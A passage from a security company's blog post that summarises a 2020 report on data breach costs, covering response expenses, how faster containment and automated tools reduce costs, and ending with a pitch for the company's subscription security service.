For example, organisations will typically email or telephone those affected, assess whether the incident needs to be reported to their regulator (and contact them where relevant) and consult with outside experts.

  • Ex-post response

These are the costs associated with recompensing affected data subjects, and the legal ramifications of the incident.

It includes credit monitoring services for victims, legal expenses, product discounts and regulatory fines.

Mitigating the cost of an attack

The report also highlighted the relationship between the cost of a data breach and the time it takes organisations to contain it. The researchers found that organisations take 280 days on average to detect and respond to an incident. However, those that can complete this process within 200 days save about $1 million (about £750,000).

The best way to do that, according to Ponemon Institute, is to implement automated tools to help detect breaches and suspicious behaviour.

Organisations that used artificial intelligence and analytics had the most success mitigating the costs of data breaches, spending $2.45 million (about £1.84 million) on their recovery process.

By contrast, organisations that didn’t implement such measures spent more than twice that, with an average cost of $6.03 million (about £4.5 million).

This is a lesson that organisations are gradually taking on board. The report found that the proportion of organisations that have implemented measures such as artificial intelligence platforms and automated tools has increased from 15% to 21% in the past two years.

Unfortunately, many organisations don’t know where to begin when implementing and testing defences. That’s where our Cyber Security as a Service can help.

With this annual subscription service, our experts are on hand to advise you on the best way to protect your organisation.

They’ll guide you through vulnerability scans, staff training and the creation of policies and procedures, which form the backbone of an effective security strategy.

The post The cost of a data breach in 2020 appeared first on IT Governance UK Blog.